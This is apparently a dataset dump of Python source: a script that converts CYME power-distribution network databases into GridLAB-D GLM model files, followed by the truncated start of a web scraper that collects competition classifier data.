{}\n\t\tfor device_id, device in table_find(cyme_table[\"sectiondevice\"],SectionId=section_id).iterrows():\n\t\t\tdevice_type = int(device[\"DeviceType\"])\n\t\t\tif device_type in glm_devices.keys():\n\t\t\t\tdevice_name = self.name(device_id,\"link\")\n\t\t\t\tdevice_dict[device_id] = self.object(\"link\", device_name , {\n\t\t\t\t\t\"phases\" : cyme_phase_name[phase],\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\t\"from\" : self.name(from_node_id,\"node\"),\n\t\t\t\t\t\"to\" : self.name(to_node_id,\"node\"),\n\t\t\t\t\t})\n\t\t\t\tkwargs[\"node_links\"][from_node_id].append(device_id)\n\t\t\t\tkwargs[\"node_links\"][to_node_id].append(device_id)\n\t\t\telse:\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: {cyme_devices[device_type]} on section {section_id} has no corresponding GLM object\")\n\t\treturn device_dict\n\n\t# add node to glm file\n\tdef add_node(self,node_id,node_links,device_dict,version):\n\t\tphase = 0\n\t\tfor device_id in node_links[node_id]:\n\t\t\tphase |= glm_phase_code[device_dict[device_id][\"phases\"]]\n\t\tobj = self.object(\"node\", self.name(node_id,\"node\"), {\n\t\t\t\"phases\" : glm_phase_name[phase]+\"N\",\n\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t})\n\t\tif node_id == table_get(cyme_table[\"headnode\"],network_id,\"NodeId\"):\n\t\t\tobj[\"bustype\"] = \"SWING\"\n\t\telse:\n\t\t\tobj[\"bustype\"] = \"PQ\"\n\t\treturn obj\n\n\t# add an overhead based on a link\n\tdef add_overhead_line(self,line_id,line,version):\n\t\tline_name = self.name(line_id,\"link\")\n\t\tlength = float(line[\"Length\"])\n\t\tconductorA_id = line[\"PhaseConductorIdA\"]\n\t\tconductorB_id = line[\"PhaseConductorIdB\"]\n\t\tconductorC_id = line[\"PhaseConductorIdC\"]\n\t\tconductorN_id = line[\"NeutralConductorId\"]\n\t\tself.add_overhead_line_conductors([conductorA_id,conductorB_id,conductorC_id,conductorN_id],version)\n\t\tspacing_id = line[\"ConductorSpacingId\"]\n\t\tself.add_line_spacing(spacing_id,version)\n\t\tconfiguration_name = self.add_line_configuration([conductorA_id,conductorB_id,conductorC_id,conductorN_id,spacing_id],version)\n\t\treturn self.object(\"overhead_line\", line_name, {\n\t\t\t\"length\" : \"%.2f m\"%length,\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})\n\n\t# add an unbalanced overhead line based on a link\n\tdef add_overhead_line_unbalanced(self,line_id,line,version):\n\t\tline_name = self.name(line_id,\"link\")\n\t\tconfiguration_id = line[\"LineId\"]\n\t\tconfiguration_name = self.name(configuration_id,\"line_configuration\")\n\t\tlength = float(line[\"Length\"])\n\t\tif not configuration_name in self.objects.keys():\n\t\t\tconfiguration = cyme_table[\"eqoverheadlineunbalanced\"].loc[configuration_id]\n\t\t\tconductorA_id = configuration[\"PhaseConductorIdA\"]\n\t\t\tconductorB_id = configuration[\"PhaseConductorIdB\"]\n\t\t\tconductorC_id = configuration[\"PhaseConductorIdC\"]\n\t\t\tconductorN_id = configuration[\"NeutralConductorId\"]\n\t\t\tconductor_names = self.add_overhead_line_conductors([conductorA_id,conductorB_id,conductorC_id,conductorN_id],version)\n\t\t\tspacing_id = configuration[\"ConductorSpacingId\"]\n\t\t\tspacing_name = self.add_line_spacing(spacing_id,version)\n\t\t\tself.object(\"line_configuration\",configuration_name,{\n\t\t\t\t\"conductor_A\" : conductor_names[0],\n\t\t\t\t\"conductor_B\" : conductor_names[1],\n\t\t\t\t\"conductor_C\" : conductor_names[2],\n\t\t\t\t\"conductor_N\" : conductor_names[3],\n\t\t\t\t\"spacing\" : spacing_name,\n\t\t\t\t})\n\t\treturn self.object(\"overhead_line\", line_name, {\n\t\t\t\"length\" : \"%.2f m\"%length,\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})\n\n\t# add overhead line conductor library entry\n\tdef add_overhead_line_conductors(self,conductors,version):\n\t\tconductor_names = []\n\t\tfor conductor_id in conductors:\n\t\t\tconductor_name = self.name(conductor_id,\"overhead_line_conductor\")\n\t\t\tif not conductor_name in self.objects.keys():\n\t\t\t\tconductor = cyme_table[\"eqconductor\"].loc[conductor_id]\n\t\t\t\tgmr = float(conductor[\"GMR\"])\n\t\t\t\tr25 = float(conductor[\"R25\"])\n\t\t\t\tdiameter = float(conductor[\"Diameter\"])\n\t\t\t\tnominal_rating = float(conductor[\"NominalRating\"])\n\t\t\t\tobj = self.object(\"overhead_line_conductor\",conductor_name,{\n\t\t\t\t\t\"geometric_mean_radius\" : \"%.2f cm\" % gmr,\n\t\t\t\t\t\"resistance\" : \"%.5f Ohm/km\" % r25,\n\t\t\t\t\t\"diameter\" : \"%.2f cm\" % diameter,\n\t\t\t\t\t\"rating.summer.continuous\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.winter.continuous\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.summer.emergency\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.winter.emergency\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t})\n\t\t\tconductor_names.append(conductor_name)\n\t\treturn conductor_names\n\n\t# line spacing library object\n\tdef add_line_spacing(self,spacing_id,version):\n\t\tspacing_name = self.name(spacing_id,\"line_spacing\")\n\t\tif not spacing_name in self.objects.keys():\n\t\t\tspacing = cyme_table[\"eqgeometricalarrangement\"].loc[spacing_id]\n\t\t\tAx = float(spacing[\"ConductorA_Horizontal\"])\n\t\t\tAy = float(spacing[\"ConductorA_Vertical\"])\n\t\t\tBx = float(spacing[\"ConductorA_Horizontal\"])\n\t\t\tBy = float(spacing[\"ConductorA_Vertical\"])\n\t\t\tCx = float(spacing[\"ConductorA_Horizontal\"])\n\t\t\tCy = float(spacing[\"ConductorA_Vertical\"])\n\t\t\tNx = float(spacing[\"NeutralConductor_Horizontal\"])\n\t\t\tNy = float(spacing[\"NeutralConductor_Vertical\"])\n\t\t\tABx = Ax-Bx; ABy = Ay-By\n\t\t\tACx = Ax-Cx; ACy = Ay-Cy\n\t\t\tBCx = Bx-Cx; BCy = By-Cy\n\t\t\tANx = Ax-Nx; ANy = Ay-Ny\n\t\t\tBNx = Bx-Nx; BNy = By-Ny\n\t\t\tCNx = Cx-Nx; CNy = Cy-Ny\n\t\t\tself.object(\"line_spacing\",spacing_name,{\n\t\t\t\t\"distance_AB\" : \"%.2f m\"%sqrt(ABx*ABx+ABy*ABy),\n\t\t\t\t\"distance_AC\" : \"%.2f m\"%sqrt(ACx*ACx+ACy*ACy),\n\t\t\t\t\"distance_BC\" : \"%.2f m\"%sqrt(BCx*BCx+BCy*BCy),\n\t\t\t\t\"distance_AN\" : \"%.2f m\"%sqrt(ANx*ANx+ANy*ANy),\n\t\t\t\t\"distance_BN\" : \"%.2f m\"%sqrt(BNx*BNx+BNy*BNy),\n\t\t\t\t\"distance_CN\" : \"%.2f m\"%sqrt(CNx*CNx+CNy*CNy),\n\t\t\t\t\"distance_AE\" : \"%.2f m\"%Ay,\n\t\t\t\t\"distance_BE\" : \"%.2f m\"%By,\n\t\t\t\t\"distance_CE\" : \"%.2f m\"%Cy,\n\t\t\t\t\"distance_NE\" : \"%.2f m\"%Ny,\n\t\t\t\t})\n\t\treturn spacing_name\n\n\t# line configuration library object\n\tdef add_line_configuration(self,items,version):\n\t\tconfiguration_id = \"_\".join(items)\n\t\tconfiguration_name = self.name(configuration_id,\"line_configuration\")\n\t\tif not configuration_name in self.objects.keys():\n\t\t\tself.object(\"line_configuration\",configuration_name,{\n\t\t\t\t\"conductor_A\" : self.name(items[0],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_B\" : self.name(items[1],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_C\" : self.name(items[2],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_N\" : self.name(items[3],\"overhead_line_conductor\"),\n\t\t\t\t\"spacing\" : self.name(items[4],\"line_spacing\")\n\t\t\t\t})\n\t\treturn configuration_name\n\n\t# get the phase switch status\n\tdef get_switch_phase_status(self,phases,state):\n\t\tif state in phases:\n\t\t\treturn \"CLOSED\"\n\t\telse:\n\t\t\treturn \"OPEN\"\n\n\t# add a switch based on a link\n\tdef add_switch(self,switch_id,switch,version):\n\t\tswitch_name = self.name(switch_id,\"link\")\n\t\tphases = cyme_phase_name[int(switch[\"ClosedPhase\"])]\n\t\treturn self.object(\"switch\", switch_name, {\n\t\t\t\"phase_A_state\" : self.get_switch_phase_status(phases,\"A\"),\n\t\t\t\"phase_B_state\" : self.get_switch_phase_status(phases,\"B\"),\n\t\t\t\"phase_C_state\" : self.get_switch_phase_status(phases,\"C\"),\n\t\t\t\"operating_mode\" : \"BANKED\"\n\t\t\t})\n\n\t# add a load\n\tdef add_load(self,load_id,load,version):\n\t\tsection_id = table_get(cyme_table[\"sectiondevice\"],load_id,\"SectionId\")\n\t\tsection = table_get(cyme_table[\"section\"],section_id)\n\t\tdevice_type = int(table_get(cyme_table[\"sectiondevice\"],load_id,\"DeviceType\"))\n\t\tif device_type == 20: # spot load is attached at from node of section\n\t\t\tparent_name = self.name(section[\"FromNodeId\"],\"node\")\n\t\telif device_type == 21: # distributed load is attached at to node of section\n\t\t\tparent_name = self.name(section[\"ToNodeId\"],\"node\")\n\t\telse:\n\t\t\traise Exception(f\"CYME device type {device_type} is not supported as a load\")\n\t\tcustomer_id = load[\"CustomerNumber\"]\n\n\t\tlink_name = self.name(load_id,\"link\")\n\t\tif link_name in self.objects.keys(): # link is no longer needed\n\t\t\tself.delete(link_name)\n\t\t\n\t\tload_name = self.name(load_id,\"load\")\n\t\tdevice_type = int(load[\"DeviceType\"])\n\t\tphase = cyme_phase_name[int(load[\"Phase\"])]\n\t\tif load_name in self.objects.keys() and \"phases\" in self.objects[load_name]:\n\t\t\tphases = self.objects[load_name][\"phases\"] + phase\n\t\telse:\n\t\t\tphases = phase\n\t\tif device_type in glm_devices.keys():\n\t\t\tConsumerClassId = load[\"ConsumerClassId\"]\n\t\t\tload_value1 = float(load[\"LoadValue1\"])\n\t\t\tload_value2 = float(load[\"LoadValue2\"])\n\t\t\tload_types = {\"Z\":\"constant_impedance\",\"I\":\"constant_current\",\"P\":\"constant_power\"}\n\t\t\tif ConsumerClassId in load_types.keys():\n\t\t\t\treturn self.object(\"load\",load_name,{\n\t\t\t\t\t\"parent\" : parent_name,\n\t\t\t\t\t\"phases\" : phases,\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\tf\"{load_types[ConsumerClassId]}_{phase}\" : \"%.4g%+.4gj\" % (load_value1,load_value2),\n\t\t\t\t\t})\n\t\t\telif ConsumerClassId in [\"PQ\",\"PV\",\"SWING\",\"SWINGPQ\"]: # GLM bus types allowed\n\t\t\t\treturn self.object(\"load\",load_name,{\n\t\t\t\t\t\"parent\" : parent_name,\n\t\t\t\t\t\"phases\" : phases,\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\t\"bustype\" : ConsumerClassId,\n\t\t\t\t\tf\"constant_impedance_{phase}\" : \"%.4g%+.4gj\" % (load_value1,load_value2),\n\t\t\t\t\t})\n\t\telse:\n\t\t\twarning(f\"{cyme_mdbname}@{network_id}: load '{load_id}' on phase '{phase}' dropped because '{cyme_devices[device_type]}' is not a supported CYME device type\")\n\n\t# add a capacitor\n\tdef add_capacitor(self,capacitor_id,capacitor,version):\n\t\tsection_id = table_get(cyme_table[\"sectiondevice\"],capacitor_id,\"SectionId\")\n\t\tsection = table_get(cyme_table[\"section\"],section_id)\n\t\tfrom_name = self.name(section[\"FromNodeId\"],\"node\")\n\t\tto_name = self.name(section[\"ToNodeId\"],\"node\")\n\n\t\tlink_name = self.name(capacitor_id,\"link\")\n\t\tif link_name in self.objects.keys(): # link is no longer needed\n\t\t\tself.delete(link_name)\n\t\t\n\t\tcapacitor_name = self.name(capacitor_id,\"capacitor\")\n\t\tphase = cyme_phase_name[int(capacitor[\"Phase\"])]\n\t\tKVARA = float(capacitor[\"KVARA\"])\n\t\tKVARB = float(capacitor[\"KVARB\"])\n\t\tKVARC = float(capacitor[\"KVARC\"])\n\t\tKVLN = float(capacitor[\"KVLN\"])\n\t\tswitchA = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchA\",switchA,f\"capacitor {capacitor_id} does not specify switch A position, valid options are 'CLOSED' or 'OPEN'\")\n\t\tswitchB = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchB\",switchB,f\"capacitor {capacitor_id} does not specify switch B position, valid options are 'CLOSED' or 'OPEN'\")\n\t\tswitchC = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchC\",switchC,f\"capacitor {capacitor_id} does not specify switch C position, valid options are 'CLOSED' or 'OPEN'\")\n\t\tcontrol = \"MANUAL\"\n\t\tself.assume(capacitor_name,\"control\",control,f\"capacitor {capacitor_id} does not specify a control strategy, valid options are 'CURRENT', 'VARVOLT', 'VOLT', 'VAR', or 'MANUAL'\")\n\t\treturn self.object(\"capacitor\",capacitor_name,{\n\t\t\t\"parent\" : from_name,\n\t\t\t\"nominal_voltage\" : f\"{KVLN} kV\",\n\t\t\t\"phases\" : phase,\n\t\t\t\"phases_connected\" : phase,\n\t\t\t\"capacitor_A\" : f\"{KVARA} kVA\",\n\t\t\t\"capacitor_B\" : f\"{KVARB} kVA\",\n\t\t\t\"capacitor_C\" : f\"{KVARC} kVA\",\n\t\t\t\"switchA\" : \"CLOSED\",\n\t\t\t\"switchB\" : \"CLOSED\",\n\t\t\t\"switchC\" : \"CLOSED\",\n\t\t\t\"control\" : \"MANUAL\",\n\t\t\t})\n\n\t# add a transformer\n\tdef add_transformer(self,transformer_id, transformer,version):\n\t\tDeviceType = int(transformer[\"DeviceType\"])\n\t\tequipment_id = transformer[\"EquipmentId\"]\n\t\tequipment = cyme_table[\"eqtransformer\"].loc[equipment_id]\n\t\tNominalRatingKVA = float(equipment[\"NominalRatingKVA\"])\n\t\tPrimaryVoltageKVLL = float(equipment[\"PrimaryVoltageKVLL\"])\n\t\tSecondaryVoltageKVLL = float(equipment[\"SecondaryVoltageKVLL\"])\n\t\tPosSeqImpedancePercent = float(equipment[\"PosSeqImpedancePercent\"])\n\t\tXRRatio = float(equipment[\"XRRatio\"])\n\t\tr = XRRatio / 100.0 / sqrt(1+XRRatio**2)\n\t\tx = r * XRRatio\n\t\tnominal_rating = \"%.4gkVA\" % (NominalRatingKVA)\n\t\tprimary_voltage = \"%.4gkV\" % (PrimaryVoltageKVLL/sqrt(3.0))\n\t\tsecondary_voltage = \"%.4gkV\" % (SecondaryVoltageKVLL/sqrt(3.0))\n\t\tconfiguration_name = self.name([nominal_rating,primary_voltage,secondary_voltage,\"R%.4g\"%(r),\"X%4g\"%(x)], \"transformer_configuration\")\n\t\tif primary_voltage == secondary_voltage:\n\t\t\tsecondary_voltage = \"%.4gkV\" % ((SecondaryVoltageKVLL+0.001)/sqrt(3.0))\n\t\t\tself.assume(configuration_name,\"secondary_voltage\",secondary_voltage,f\"transformer {transformer_id} primary voltage is the same as secondary voltage\")\n\t\tif r == 0.0:\n\t\t\tr = 0.000333\n\t\t\tx = 0.00222\n\t\t\tself.assume(configuration_name,\"resistance\",r,f\"transformer {transformer_id} XRRatio is zero\")\n\t\t\tself.assume(configuration_name,\"reactance\",x,f\"transformer {transformer_id} XRRatio is zero\")\n\n\t\tconnect_type = \"WYE_WYE\"\n\t\tself.assume(configuration_name,\"connect_type\",connect_type,f\"transformer '{transformer_id}' does not specify connection type\")\n\t\tinstall_type = \"PADMOUNT\"\n\t\tself.assume(configuration_name,\"install_type\",install_type,f\"transformer '{transformer_id}' does not specify install type\")\n\n\t\tself.object(\"transformer_configuration\", configuration_name, {\n\t\t\t\"connect_type\" : \"WYE_WYE\",\n\t\t\t\"install_type\" : \"PADMOUNT\",\n\t\t\t\"power_rating\" : \"%.4gkVA\" % (NominalRatingKVA),\n\t\t\t\"primary_voltage\" : primary_voltage,\n\t\t\t\"secondary_voltage\" : secondary_voltage,\n\t\t\t\"resistance\" : r,\n\t\t\t\"reactance\" : x,\n\t\t\t})\n\t\tlink_name = self.name(transformer_id,\"link\")\n\t\treturn self.object(\"transformer\", link_name, {\n\t\t\t\"nominal_voltage\" : None,\n\t\t\t\"phases\" : \"\".join(sorted(set(self.objects[link_name][\"phases\"] + \"N\"))),\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})\n\n\t# add a regulator\n\tdef add_regulator(self, regulator_id, regulator, version):\n\t\tequipment_id = regulator[\"EquipmentId\"]\n\t\tequipment = cyme_table[\"eqregulator\"].loc[equipment_id]\n\n\t\tCTPrimaryRating = float(regulator[\"CTPrimaryRating\"])\n\t\tPTRatio = float(regulator[\"PTRatio\"])\n\t\tBandWidth = float(regulator[\"BandWidth\"])\n\t\tBoostPercent = float(regulator[\"BoostPercent\"])\n\t\tBuckPercent = float(regulator[\"BuckPercent\"])\n\t\tTapPositionA = float(regulator[\"TapPositionA\"])\n\t\tTapPositionB = float(regulator[\"TapPositionB\"])\n\t\tTapPositionC = float(regulator[\"TapPositionC\"])\n\t\tControlStatus = float(regulator[\"ControlStatus\"])\n\t\tReverseSensingMode = float(regulator[\"ReverseSensingMode\"])\n\t\tReverseThreshold = float(regulator[\"ReverseThreshold\"])\n\t\tX = float(regulator[\"X\"])\n\t\tY = float(regulator[\"Y\"])\n\t\tStatus = int(regulator[\"Status\"])\n\t\tReversible = int(regulator[\"Reversible\"])\n\n\t\tRatedKVA = float(equipment[\"RatedKVA\"])\n\t\tRatedKVLN = float(equipment[\"RatedKVLN\"])\n\t\tNumberOfTaps = int(equipment[\"NumberOfTaps\"])\n\n\t\tconnect_type = \"WYE_WYE\"\n\t\tControl = \"OUTPUT_VOLTAGE\"\n\t\ttime_delay = \"30s\"\n\t\tband_center = \"${GLM_NOMINAL_VOLTAGE}\"\n\t\tband_width = \"%.1gV\" % (BandWidth)\n\t\tconfiguration_name = self.name([band_width,time_delay],\"regulator_configuration\")\n\t\tself.assume(configuration_name,\"connect_type\",connect_type,f\"regulator '{regulator_id}' does not specify connection type\")\n\t\tself.assume(configuration_name,\"Control\",Control,f\"regulator '{regulator_id}' does not specify control type\")\n\t\tself.assume(configuration_name,\"time_delay\",time_delay,f\"regulator '{regulator_id}' does not specify time delay\")\n\t\tself.assume(configuration_name,\"band_center\",band_center,f\"regulator '{regulator_id}' does not specify time delay\")\n\n\t\tself.object(\"regulator_configuration\", configuration_name, {\n\t\t\t\"connect_type\" : connect_type,\n\t\t\t\"band_center\" : band_center,\n\t\t\t\"band_width\" : band_width,\n\t\t\t\"time_delay\" : time_delay,\n\t\t\t\"raise_taps\" : \"%.0f\" % float(NumberOfTaps/2),\n\t\t\t\"lower_taps\" : \"%.0f\" % float(NumberOfTaps/2),\n\t\t\t\"regulation\" : \"%.1f%%\" % (BandWidth / RatedKVLN * 100),\n\t\t\t\"tap_pos_A\" : \"%.0f\" % (TapPositionA),\n\t\t\t\"tap_pos_B\" : \"%.0f\" % (TapPositionB),\n\t\t\t\"tap_pos_C\" : \"%.0f\" % (TapPositionC),\n\t\t\t\"Control\" : Control\n\t\t\t})\n\n\t\tlink_name = self.name(regulator_id,\"link\")\n\t\tregulator_name = self.name(regulator_id,\"regulator\")\n\t\tsense_node = self.objects[link_name][\"to\"]\n\t\tself.assume(link_name,\"sense_node\",sense_node,f\"regulator '{regulator_id}' does not specify sense node\")\n\t\treturn self.object(\"regulator\", self.name(regulator_id,\"link\"), {\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t\"sense_node\" : sense_node,\n\t\t\t})\n\n#\n# CYME 5 MDB extractor\n#\ndef cyme_extract_5020(network_id,network):\n\n\tcreation_time = int(network[\"CreationTime\"])\n\tlast_change = int(network[\"LastChange\"])\n\tload_factor = float(network[\"LoadFactor\"])\n\tglmname = os.path.abspath(f\"{output_folder}/{cyme_mdbname}_{network_id}.glm\")\n\n\tglm = GLM(glmname,\"w\")\n\tglm.comment(\n\t\tf\"Automatically generated by {git_project.replace('.git','/postproc/write_glm.py')}\",\n\t\t)\n\n\tglm.blank()\n\tglm.comment(\"\",\"Application information\",\"\")\n\tglm.define(\"APP_COMMAND\",app_command)\n\tglm.define(\"APP_VERSION\",app_version)\n\n\tglm.blank()\n\tglm.comment(\"\",\"Git information\",\"\")\n\tglm.define(\"GIT_PROJECT\",git_project)\n\tglm.define(\"GIT_COMMIT\",git_commit)\n\tglm.define(\"GIT_BRANCH\",git_branch)\n\n\tglm.blank()\n\tglm.comment(\"\",\"GLM creation context\",\"\")\n\tglm.define(\"GLM_PATHNAME\",glmname)\n\tglm.define(\"GLM_CREATED\",dt.datetime.utcnow().isoformat())\n\tglm.define(\"GLM_USER\",os.getenv(\"USER\"))\n\tglm.define(\"GLM_WORKDIR\",os.getenv(\"PWD\"))\n\tglm.define(\"GLM_LANG\",os.getenv(\"LANG\"))\n\n\t# settings from model\n\tglm.blank()\n\tglm.comment(\"\",\"CYME model information\",\"\")\n\tglm.define(\"CYME_MDBNAME\",cyme_mdbname)\n\tglm.define(\"CYME_VERSION\",version)\n\tglm.define(\"CYME_CREATED\",dt.datetime.fromtimestamp(creation_time).isoformat())\n\tglm.define(\"CYME_MODIFIED\",dt.datetime.fromtimestamp(last_change).isoformat())\n\tglm.define(\"CYME_LOADFACTOR\",load_factor)\n\tglm.define(\"CYME_NETWORKID\",network_id)\n\n\t# settings from config.csv\n\tglm.blank()\n\tglm.comment(\"\",\"Settings from 'config.csv'\",\"\")\n\tdefine = settings[\"GLM_DEFINE\"].split(\"=\")\n\tif type(define) is list and len(define) > 1:\n\t\tglm.define(define[0].strip(),\"=\".join(define[1:]).strip())\n\tif settings[\"GLM_NOMINAL_VOLTAGE\"]:\n\t\tglm.define(\"GLM_NOMINAL_VOLTAGE\",settings[\"GLM_NOMINAL_VOLTAGE\"])\n\tfor include in settings[\"GLM_INCLUDE\"].split():\n\t\tglm.include(include.strip())\n\tif not settings[\"GLM_NOMINAL_VOLTAGE\"]:\n\t\tif settings[\"GLM_INCLUDE\"]: # cannot verify setting in GLM_INCLUDE until run in gridlabd\n\t\t\tglm.ifndef(\"GLM_NOMINAL_VOLTAGE\",lambda:glm.error(\"GLM_NOMINAL_VOLTAGE must be defined in either 'config.csv' or the GLM_INCLUDE file\"))\n\t\telse:\n\t\t\terror(\"GLM_NOMINAL_VOLTAGE must be defined in either 'config.csv' or the GLM_INCLUDE file\")\n\n\tglm.blank()\n\tglm.comment(\"\",\"Modules\",\"\")\n\tglm.module(\"powerflow\",{\"solver_method\":\"NR\"})\n\n\tnode_dict = {}\n\tdevice_dict = {}\n\tnode_links = {}\n\n\t# cyme_table[\"node\"] graph data\n\tfor node_id, node in table_find(cyme_table[\"node\"],NetworkId=network_id).iterrows():\n\t\tnode_links[node_id] = [] # incident links\n\t\tnode_dict[node_id] = [] # node dictionary\n\n\tglm.blank()\n\tglm.comment(\"\",\"Objects\",\"\")\n\n\t# links\n\tfor section_id, section in table_find(cyme_table[\"section\"],NetworkId=network_id).iterrows():\n\t\tlinks = glm.add(\"link\",section_id,section, version=5020, node_links=node_links)\n\t\tif links:\n\t\t\tdevice_dict.update(links)\n\n\t# cyme_table[\"node\"]\n\tfor node_id in node_dict.keys():\n\t\tnode_dict[node_id] = glm.add_node(node_id, node_links, device_dict, version=5020)\n\n\t# overhead lines\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"overheadbyphase\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"overhead_line\", cyme_id, cyme_data, version=5020)\n\n\t# unbalanced overhead lines\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"overheadlineunbalanced\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"overhead_line_unbalanced\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"load\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"customerload\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"load\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"transformer\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"transformer\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"transformer\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"regulator\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"regulator\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"regulator\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"capacitor\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"shuntcapacitor\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"capacitor\", cyme_id, cyme_data, version=5020)\n\t# switches\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"switch\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"switch\", cyme_id, cyme_data, version=5020)\n\n\t# collapse links\n\tdone = False\n\twhile not done:\n\t\tdone = True\n\t\tfor name in list(glm.objects.keys()):\n\t\t\ttry:\n\t\t\t\tdata = glm.objects[name]\n\t\t\t\tif \"class\" in data.keys() and data[\"class\"] == \"link\": # needs to be collapse\n\t\t\t\t\tfrom_node = data[\"from\"]\n\t\t\t\t\tto_node = data[\"to\"]\n\t\t\t\t\twhile \"parent\" in glm.objects[to_node].keys() and glm.objects[to_node][\"parent\"][\"class\"] == \"node\": # don't allow grandchild cyme_table[\"node\"]\n\t\t\t\t\t\tto_node = glm.objects[to_node][\"parent\"]\n\t\t\t\t\tglm.objects[to_node][\"parent\"] = from_node\n\t\t\t\t\tglm.delete(name)\n\t\t\t\t\tdone = False\n\t\t\t\t\tbreak\n\t\t\t\telif \"class\" in data.keys() and data[\"class\"] in [\"node\",\"load\"] and \"parent\" in data.keys():\n\t\t\t\t\tparent_name = data[\"parent\"]\n\t\t\t\t\tparent_data = glm.objects[parent_name]\n\t\t\t\t\tif \"class\" in parent_data.keys() and parent_data[\"class\"] in [\"node\",\"load\"] and \"parent\" in parent_data.keys():\n\t\t\t\t\t\tgrandparent = parent_data[\"parent\"]\n\t\t\t\t\t\tdata[\"parent\"] = grandparent\n\t\t\t\t\t\tdone = False\n\t\t\t\t\t\tbreak\n\t\t\texcept Exception as exc:\n\t\t\t\twarning(format_exception(\"link removal failed\",name,glm.objects[name]))\n\t\t\t\tglm.delete(name)\n\t\t\t\tpass\n\n\t#\n\t# Check conversion\n\t#\n\tfor name, data in glm.objects.items():\n\t\tif not \"name\" in data.keys():\n\t\t\twarning(\"%s: object does not have a name, object data [%s]\" % (glm.filename,data))\n\t\telif not \"class\" in data.keys():\n\t\t\twarning(\"%s: object '%s' does not have a class\" % (glm.filename,data[\"name\"]))\n\t\telif data[\"class\"] in [\"link\",\"powerflow_object\",\"line\"]:\n\t\t\twarning(\"%s: object '%s' uses abstract-only class '%s'\" % (glm.filename,data[\"name\"],data[\"class\"]))\n\n\tglm.close()\n\n#\n# Process cyme_table[\"network\"]\n#\ncyme_extract = {\n\t\"50\" : cyme_extract_5020, # CYME version 5 database\n}\ncyme_extract[\"-1\"] = cyme_extract[str(default_cyme_extractor)]\nnetwork_count = 0\nfor network_id, network in cyme_table[\"network\"].iterrows():\n\t\n\tif not re.match(settings[\"GLM_NETWORK_MATCHES\"],network_id):\n\t\tcontinue\n\telse:\n\t\tnetwork_count += 1\n\n\tversion = network[\"Version\"]\n\tfound = False\n\tfor key, extractor in cyme_extract.items():\n\t\tif re.match(key,version):\n\t\t\tif version == \"-1\":\n\t\t\t\twarning(f\"CYME model version is not specified (version=-1), using default extractor for version '{default_cyme_extractor}*'\")\n\t\t\textractor(network_id,network)\n\t\t\tfound = True\n\tif not found:\n\t\traise Exception(f\"CYME model version {version} is not supported\")\n\n#\n# Final checks\n#\n\nif network_count == 0:\n\twarning(f\" {cyme_mdbname}: the network pattern '{settings['GLM_NETWORK_MATCHES']}' did not match any networks in the database\")\nelif warning_count > 0:\n\tprint(\"Model conversion problems can be corrected using 'GLM_MODIFY=modify.csv' in 'config.csv'.\")\n\tprint(\" See http://docs.gridlabd.us/index.html?owner=openfido&project=cyme-extract&doc=/Post_processing/Write_glm.md for details\")\t\n\nprint(f\"CYME-to-GridLAB-D conversion done: {network_count} networks processed, {warning_count} warnings, {error_count} errors\")\n","repo_name":"xiefuhong/cyme-extract","sub_path":"postproc/write_glm.py","file_name":"write_glm.py","file_ext":"py","file_size_in_byte":38739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"65"} +{"seq_id":"23861840277","text":"import re\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport settings\nimport hf\n\nclassifiers_response = requests.post(settings.getClassifierUrl())\nclassifier_node = BeautifulSoup(classifiers_response.text, 'html.parser')\n\ndivision_elements = classifier_node.select('#calc_selDiv > option')\ndivisions = [{'id': opt.get('value'), 'name': opt.text}\n for opt in division_elements]\n\nclassifier_elements = classifier_node.select('#calc_selClassifier > option')\nclassifiers = [\n {\n 'id': opt.get('value'),\n 'stage_number': re.split('\\s{7}', opt.text)[0],\n 'name': re.split('\\s{7}', opt.text)[1]\n } for opt in classifier_elements\n]\n\n# print(divisions[0:1])\n\nfor classifier in classifiers[0:1]:\n classifier['divisions'] = {\n division['name'].lower(): hf.getHitFactors(classifier, division)\n for division in divisions[0:1]\n }\n\noutput = {\n 'classifiers': classifiers,\n 'divisions': 